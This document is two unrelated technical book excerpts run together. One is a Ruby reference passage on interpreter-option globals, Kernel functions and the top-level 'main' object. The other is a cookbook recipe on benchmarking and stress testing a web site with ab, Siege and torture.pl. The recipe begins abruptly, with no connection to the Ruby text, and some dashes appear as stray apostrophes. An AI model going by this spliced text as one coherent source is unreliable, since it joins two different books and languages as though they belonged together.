      state or value of interpreter command-line options. The variables
      $-0, $-F,
      $-I, $-K,
      $-d, $-v, and
      $-w have synonyms and are included in the previous
      sections:





      $-a



      true if the interpreter option
      -a was specified; false
      otherwise. Read-only.






      $-i



      nil if the interpreter option
      -i was not specified. Otherwise, this
      variable is set to the backup file extension specified with
      -i.






      $-l



      true if the -l
      option was specified. Read-only.






      $-p



      true if the interpreter option
      -p was specified; false
      otherwise. Read-only.






      $-W



      In Ruby 1.9, this global variable specifies the current
      verbose level. It is 0 if the -W0 option was used, and is
      2 if any of the options
      -w, -v, or
      --verbose were used. Otherwise, this variable
      is 1. Read-only.







      10.2.4. Predefined Global Functions


      The Kernel module, which is included by
      Object, defines a number of private instance methods
      that serve as global functions. Because they are private, they must be
      invoked functionally, without an explicit receiver object. And because
      they are included by Object, they can be invoked
      anywhere—no matter what the value of self is, it will
      be an object, and these methods can be implicitly invoked on it. The
      functions defined by Kernel can be grouped into
      several categories, most of which are covered elsewhere in this chapter
      or elsewhere in this book.



      10.2.4.1. Keyword functions

      The following Kernel functions behave like
      language keywords and are documented elsewhere in this book:


      block_given?    iterator?       loop            require
      callcc lambda proc throw
      catch load raise





      10.2.4.2. Text input, output, and manipulation functions

      Kernel defines the following functions most
      of which are global variants of IO methods. They
      are covered in more detail in Section 10.3:


      format          print           puts            sprintf
      gets printf readline
      p putc readlines



      In Ruby 1.8 (but not 1.9), Kernel also
      defines the following global variants of String
      methods that operate implicitly on $_:


      chomp   chop    gsub    scan    sub
      chomp! chop! gsub! split sub!





      10.2.4.3. OS methods

      The following Kernel functions allow a Ruby
      program to interface with the operating system. They are
      platform-dependent and are covered in Section 10.4. Note that
      ` is the specially named backtick method that
      returns the text output by an arbitrary OS shell command:


      `       fork    select  system  trap
      exec open syscall test





      10.2.4.4. Warnings, failures, and exiting

      The following Kernel functions display
      warnings, raise exceptions, cause the program to exit, or register
      blocks of code to be run when the program terminates. They are
      documented along with OS-specific methods in Section 10.4:


      abort   at_exit exit    exit!   fail    warn





      10.2.4.5. Reflection functions

      The following Kernel functions are part of
      Ruby's reflection API and were described in Chapter 8:


      binding                         set_trace_func
      caller singleton_method_added
      eval singleton_method_removed
      global_variables singleton_method_undefined
      local_variables trace_var
      method_missing untrace_var
      remove_instance_variable





      10.2.4.6. Conversion functions

      The following Kernel functions attempt to
      convert their arguments to a new type. They were described in Section 3.8.7.3:


      Array   Float   Integer String





      10.2.4.7. Miscellaneous Kernel functions

      The following miscellaneous Kernel functions
      don't fit into the previous categories:


      autoload                rand                    srand
      autoload? sleep



      rand and srand are for
      generating random numbers, and are documented in Section 9.3.7. autoload and
      autoload? are covered in Section 7.6.3. And sleep is covered in
      Section 9.9 and Section 10.4.4.





      10.2.5. User-Defined Global Functions


      When you define a method with def inside a
      class or module declaration and do
      not specify a receiver object for the method, the method is created as a
      public instance method of self, where
      self is the class or module you are defining. Using
      def at the top level, outside of any
      class or module, is different in
      two important ways. First, top-level methods are instance methods of
      Object (even though self is not
      Object). Second, top-level methods are always
      private.



      Top-Level self: the Main Object


      Because top-level methods become instance methods of
      Object, you might expect that the value of
      self would be Object. In fact,
      however, top-level methods are a special case: methods are defined in
      Object, but self is a different
      object. This special top-level object is known as the "main" object,
      and there is not much to say about it. The class of the
      main object is Object, and it
      has a singleton to_s method that returns the string
      "main".




      The fact that top-level methods are defined in
      Object means that they are inherited by all objects
      (including Module and Class) and
      (if not overridden) can be used within any class or instance method
      definition. (You can review Ruby's method name resolution algorithm in
      Section 7.8 to convince yourself of this.) The fact
      that top-level methods are private means that they must be invoked like
      functions, without an explicit receiver. In this way, Ruby mimics a
      procedural programming paradigm within its strictly object-oriented
      framework.










      Recipe 21.4. Stress Testing Your Web Site










      Recipe 21.4. Stress Testing Your Web Site



      21.4.1. Problem


      You want
      to find out how well your web site performs under a heavy load.




      21.4.2. Solution


      Use a stress-testing and benchmarking tool to simulate a variety of load levels.




      21.4.3. Discussion


      Stress testing is frequently confused with benchmarking, and it is important to recognize the difference between the two activities.


      Benchmarking a web site is often a somewhat casual activity when performed by an individual developer. The most commonly used tool is the

      Apache HTTP server benchmarking tool, ab, which is designed to test how many requests per second an HTTP server is capable of serving. For example:


      % /usr/bin/ab -n 1000 -c 100 -k
      www.example.com/test.php



      This test would return a report illustrating the average response time for requests to http://www.example.com/test.php, based on 1,000 requests, grouped in batches of 100 concurrent requests.


      While that sort of test has value'it gives you a reasonable estimation of how many requests you can serve per second under normal load'it doesn't tell you much about how your entire web application will behave under heavy load. It only pounds on one URL at a time, after all.


      Stress testing is a testing technique whose intent is to break your web application. By testing to a breaking point, you can identify and repair weaknesses in your application, or gain a better understanding of when you will need to add additional hardware. When combined with code profiling, you can also get an idea of what part of your application will need to scale first; i.e., will you need to add more servers to your database cluster before you need to add more frontend web server machines?


      An excellent open source tool for stress testing is Siege. Siege can be configured to read a large number of URLs from a configuration file and run through them in order (regression testing), or it can read a list or URLs and hit them randomly, which better approximates real-world usage of a web site. Siege can also pound on a single URL in a similar fashion to ab.


      If you are unable to install Siege on your system, Lincoln Stein's torture.pl script is a good alternative. Many of Siege's design concepts were inspired by torture.pl, and the two tools produce similar reports.




      21.4.4. See Also


      Source and documentation for Siege at http://www.joedog.org/JoeDog/Siege; ab at http://httpd.apache.org/docs/2.0/programs/ab.html; source and documentation for torture.pl at http://stein.cshl.org/~lstein/torture/.